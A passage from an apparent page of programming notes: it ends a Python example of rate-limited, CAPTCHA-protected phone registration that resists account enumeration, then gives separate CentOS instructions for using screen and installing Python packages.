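    _captchas[token] = (answer, now + CAPTCHA_TTL)
    return token

def consume_captcha(token, answer, now):
    expected = _captchas.pop(token, None)   # pop first: one attempt per token
    if expected is None or now > expected[1]:
        return False
    return secrets.compare_digest(expected[0], answer)

def over_limit(client, now):
    q = _hits[client]
    while q and q[0] <= now - WINDOW:   # drop timestamps outside the window
        q.popleft()
    q.append(now)                       # failed attempts count as well
    return len(q) > LIMIT

def register_hardened(client, phone, token, answer, now):
    if over_limit(client, now) or not consume_captcha(token, answer, now):
        return GENERIC
    if phone not in REGISTERED:
        send_sms(phone)                 # queue asynchronously in production so timing is uniform
    return GENERIC
```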

Running a Python program in the background on CentOS with the screen command

#If yum reports that it is locked, run the following
rm -rf /var/run/yum.pid

#Install screen
yum -y install screen

#Start screen
screen

#List sessions
screen -ls

#Resume a session
screen -r <session ID>

Option reference
-A  Resize all windows to the size of the current terminal.
-d <session name>  Detach the specified screen session.
-h <lines>  Set the number of scrollback buffer lines for the window.
-m  Force creation of a new screen session even when already inside one.
-r <session name>  Reattach a detached screen session.
-R  First try to reattach a detached session; if none is found, create a new one.
-s  Specify the shell to run when a new window is created.
-S <session name>  Set the name of the screen session.
-v  Show version information.
-x  Reattach a previously detached screen session.
-ls or --list  List all current screen sessions.
-wipe  Check all current screen sessions and remove those that are no longer usable.

Compiling with py2exe on Windows bundles all the dynamic libraries as well; the Python compile module only compiles the current file and the dependencies are still needed, so the referenced libraries must be installed: #If pip is missing, install it first; if it warns that pip is outdated, update it.
yum install python-pip && pip install --upgrade pip
pip install requests
yum install libxslt-devel && pip install lxml
pip install beautifulsoup4